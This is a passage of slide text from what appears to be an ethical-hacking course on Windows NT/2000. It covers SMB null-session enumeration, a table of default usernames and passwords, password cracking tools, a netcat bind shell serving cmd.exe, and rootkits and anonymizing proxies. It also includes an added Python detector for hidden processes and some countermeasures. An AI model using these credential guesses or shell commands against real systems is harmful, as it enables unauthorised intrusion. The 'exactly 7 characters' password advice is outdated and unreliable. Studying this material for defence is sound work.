Page 73: Day3 Backup

SMB/NetBios Explained and Exploited

Mapping a drive with the following syntax will prompt for a password

A Null Session is a connection with no user name and no password, over TCP 139, 445, IPX or NetBEUI

Null sessions are not meaningfully logged

They are a normal part of other network operations

Hackers can use them to enumerate the network

net use * \\target\share * /user:domain\username

net use \\target\share "" /user:""

Page 74: Day3 Backup

Host Enumeration

Just to reiterate… we are connecting with a BLANK username and a BLANK password

This functionality is enabled by default on NT/2000 (port 445 also)

This is one of the most debilitating vulnerabilities faced by NT/2000 deployments of all sizes!!!!

This connection is not logged in the Event Log, nor is it recorded by a majority of the Host Based IDS products

Page 75: Day3 Backup

Penetration

The primary goal is to authenticate ourselves to the remote host. We can do this by:

Guessing username / password combinations,

Obtaining the user hashes, or

Exploiting a vulnerable service

Page 76: Day3 Backup

Password Guessing

Guessing Username/Password combinations:

Review results from DumpSec output

Identify those that:

• haven’t changed their passwords recently

• haven’t logged on recently

• are members of the admin group

• may be a shared group account

• are lab or test accounts

• have juicy info in the comment field

Page 77: Day3 Backup

Guessing Passwords

NT/2000 does not support logging on with multiple credentials simultaneously, so:

Log off as null session user:

net use * /del

Attempt to logon as target user:

net use \\target\ipc$ * /user:target\username

Page 78: Day3 Backup

Password Guessing

High Probability Combinations

Username        Passwords
administrator   blank, password, administrator
arcserve        arcserve, backup
test            test, password
lab             lab, password
username        username, company_name
backup          backup
tivoli          tivoli
symbiator       symbiator, as400
backupexec      backup

Page 79: Day3 Backup

enum Brute Force Features

usage: enum [switches] [hostname|ip]

-U: get userlist

-M: get machine list

-N: get namelist dump (different from -U|-M)

-S: get sharelist

-P: get password policy information

-G: get group and member list

-L: get LSA policy information

-D: dictionary crack, needs -u and -f

-d: be detailed, applies to -U and -S

-c: don't cancel sessions

-u: specify username to use (default "")

-p: specify password to use (default "")

-f: specify dictfile to use (wants -D)

Page 80: Day3 Backup

enum Brute Force Features

Page 81: Day3 Backup

Password Guessing

Countermeasures

Enable lockout for all accounts

Use passprop to enable Admin lockout (remote only, not TS)

Enforce password policy (passfilt, KB Q161990, W2K Account Policy)

Audit logon/logoff failures

Treat the Administrator and Domain Admins accounts as holders of the keys to the kingdom – they are!

Page 82: Day3 Backup

Sniffing Password Data

NT/2000 uses a challenge/response authentication mechanism

Neither passwords nor their hashes are sent across the wire

However, the L0pht discovered a way to extract hashes from the logon exchange

SMB Packet Capture

L0pht Crack (2.52) works on an NT4 machine but does not work on Win 2000

Version 3 incorporates a new packet driver that works? [not yet] on Win 2000

ScoopLM from SecurityFriday does work on Win2k

Page 83: Day3 Backup

Sniffing Passwords..L0pht

Page 84: Day3 Backup

Sniffing Passwords..ScoopLM

Page 85: Day3 Backup

Cracking Passwords

Once you’ve obtained password hashes, there’s no good reason not to start cracking them immediately

Several tools have been written to optimize this process

The best are:

L0phtcrack

John the Ripper

BeatLM for use with ScoopLM

Page 86: Day3 Backup

Cracking Passwords

L0phtcrack

Page 87: Day3 Backup

Cracking Passwords

John the Ripper Version 1.6 Copyright (c) 1996-98 by Solar Designer

Usage: john [OPTIONS] [PASSWORD-FILES]

-single "single crack" mode

-wordfile:FILE, -stdin wordlist mode, read words from FILE or stdin

-rules enable rules for wordlist mode

-incremental[:MODE] incremental mode [using section MODE]

-external:MODE external mode or word filter

-stdout[:LENGTH] no cracking, just write words to stdout

-restore[:FILE] restore an interrupted session [from FILE]

-session:FILE set session file name to FILE

-status[:FILE] print status of a session [from FILE]

-makechars:FILE make a charset, FILE will be overwritten

-show show cracked passwords

-test perform a benchmark

-users:[-]LOGIN|UID[,..] load this (these) user(s) only

-groups:[-]GID[,..] load users of this (these) group(s) only

-shells:[-]SHELL[,..] load users with this (these) shell(s) only

-salts:[-]COUNT load salts with at least COUNT passwords only

-format:NAME force ciphertext format NAME (DES/BSDI/MD5/BF/AFS/LM)

-savemem:LEVEL enable memory saving, at LEVEL 1..3

Page 88: Day3 Backup

Cracking Passwords

Countermeasure

Enforce password length of exactly 7 characters

All passwords should meet complexity minimums, such as different case, numerals, and punctuation

Page 89: Day3 Backup

Get Interactive Overview

If we are truly to become the machine there are certain things we must do

Firstly, copy up our Admin Kit

Second, is to gain an interactive shell

Last is to prepare target machine in order to launch further attacks

Page 90: Day3 Backup

Get Interactive

Map to a drive on the target host and copy over the following files:

fscan

Netcat

Local

Global

Pwdump2,3

Remote

Lsadump2

Cp

DumpSec

Getmac

Netdom

Nltest

Page 91: Day3 Backup

Get Interactive : REMOTE.EXE

Launch remote.exe on the target host

Syntax: remote /s "cmd.exe" [secret]

Connect to remote pipe

Syntax: remote /c hostname [secret]

Page 92: Day3 Backup

Get Interactive : NC.EXE

Netcat syntax on remote host: nc -l -d -p 2002 -e "cmd.exe"

Netcat syntax to connect to listener: nc -n -v target_ip 2002

This is the preferable method, but it only works over IP. Great when 139 is blocked.

Page 93: Day3 Backup

Operating System and Application-Level Attacks

Buffer Overflows in Depth

Buffer Overflow Exploit

In general, a buffer overflow attack involves the following steps:

i. stuffing more data into a buffer than it can handle

ii. overwriting the return address of a function

iii. switching the execution flow to the hacker’s code

Page 94: Day3 Backup

Operating System and Application-Level Attacks

Process Memory Region

Page 95: Day3 Backup

RootKit

Root Kits

The name “rootkit” is a combination of two words, root and kit

A collection of tools that enables an attacker to keep root power

Types of Rootkit

Application rootkit - established at the application layer.

Kernel rootkit - established deeper, in the kernel layer.

Page 96: Day3 Backup

Application Rootkit

Programs replaced to hide the attacker’s presence.

Examples: ls, ps, top, du, find, ifconfig, lsof

Network daemons with a backdoor

Sniffer program

Kernel Rootkit

Hiding processes

Hiding files

Hiding the sniffer

Hiding the file system

RootKit (Cont…)

Page 97: Day3 Backup

NT Rootkit

Process hiding

Page 98: Day3 Backup

NT Rootkit

File hiding

Page 99: Day3 Backup

NT Rootkit

Rootkit console with Keyboard sniffing

Page 100: Day3 Backup

Detecting hidden processes

Two software tools
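The slide does not say what the two tools do, so as an added example (not from the slides) here is the cross-view technique that such detectors commonly rely on, written for Linux procfs rather than NT: enumerate processes the way ps does (readdir on /proc), enumerate them again by looking up /proc/<pid>/status directly for every candidate PID, and report anything the second view finds that the first omitted. Thread IDs also resolve under /proc without being listed, so the Tgid == Pid test keeps only real processes, and a second directory listing narrows the race with processes created during the scan. The full scan needs a Linux host; the parsing and comparison functions run anywhere.

```python
import os
from typing import Dict, Set


def parse_status(text: str) -> Dict[str, str]:
    """Turn the 'Key:\tvalue' lines of /proc/<pid>/status into a dict."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return fields


def is_thread_group_leader(status: Dict[str, str]) -> bool:
    """Only entries whose Tgid equals their Pid are processes; the rest are threads."""
    tgid = status.get("Tgid")
    return tgid is not None and tgid == status.get("Pid")


def pids_from_listing() -> Set[int]:
    """View 1: what a process-listing tool sees (readdir on /proc, as ps does)."""
    return {int(name) for name in os.listdir("/proc") if name.isdigit()}


def pids_by_lookup(max_pid: int) -> Set[int]:
    """View 2: probe every candidate PID by direct path lookup. A rootkit that filters
    directory listings frequently leaves direct lookups untouched."""
    found: Set[int] = set()
    for pid in range(1, max_pid + 1):
        try:
            with open(f"/proc/{pid}/status", encoding="ascii", errors="replace") as fh:
                status = parse_status(fh.read())
        except OSError:
            continue
        if is_thread_group_leader(status):
            found.add(pid)
    return found


def hidden_pids(listing_before: Set[int], lookup: Set[int],
                listing_after: Set[int]) -> Set[int]:
    """Cross-view difference. A process started during the scan appears in the lookup
    but not in the first listing; subtracting both listings removes most such noise."""
    return lookup - (listing_before | listing_after)


def scan(max_pid: int = 0) -> Set[int]:
    """Run the full cross-view scan on a Linux host and return PIDs that exist but are
    not listed. Scan time grows with pid_max; pass a smaller max_pid for a quick check."""
    if not os.path.isdir("/proc"):
        raise RuntimeError("requires Linux procfs")
    if max_pid <= 0:
        with open("/proc/sys/kernel/pid_max") as fh:
            max_pid = int(fh.read())
    before = pids_from_listing()
    looked_up = pids_by_lookup(max_pid)
    after = pids_from_listing()
    return hidden_pids(before, looked_up, after)


if __name__ == "__main__":
    print("hidden:", sorted(scan()))
```

A kernel rootkit that hooks the lookup path as well as readdir defeats this particular pair of views, which is why detectors compare more than two sources (scheduler structures, network socket owners, a view taken from outside the running kernel). The principle stays the same: any object one view reports and another hides is worth a look.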

Page 101: Day3 Backup

Anonymity on the web

Anonymity and the Internet

Anonymizing proxy

Case Studies – Anonymity WebSite

Case Studies – Anonymity Software

Questions

Page 102: Day3 Backup

Anonymity and the Internet

Anonymity: the state of being unknown or unfamiliar

Sometimes it is important for one’s identity to remain anonymous

Why might individuals want their identity to remain anonymous?

People generally do not like to be tracked without their knowledge. The average web surfer and Internet hacker wishes to remain anonymous.

Page 103: Day3 Backup

Anonymity and the Internet

There are many ways user information can be discovered.

An individual’s location or identity can be determined using “cookies” and/or an IP address

Cookie: a small piece of information that a server stores on the user’s computer. Example: a yellow pages site

IP address: a series of four numbers which uniquely identify your computer on the Internet. Example: 129.186.1.201

ISPs keep track of the IP addresses their customers use, and may also keep records of names and pseudonyms

Page 104: Day3 Backup

Anonymizing proxy

Acts as a proxy for users

Hides information from end servers

Sees all web traffic

Free and subscription services available

Some free services add advertisements to web pages

Figure: Browser, Proxy and End Server; the request passes from the browser through the proxy to the end server, and the reply returns along the same path.

Page 105: Day3 Backup

Case Studies – Anonymity WebSite

Anonymizer.com

Proxify.com

Page 106: Day3 Backup

Case Studies – Anonymity Software

JAP

It is integrated with the browser

Page 107: Day3 Backup

Case Studies – Anonymity Software

Hopster: Bypass Firewall, Bypass Proxy

Page 108: Day3 Backup

Anonymity on the web

Questions ??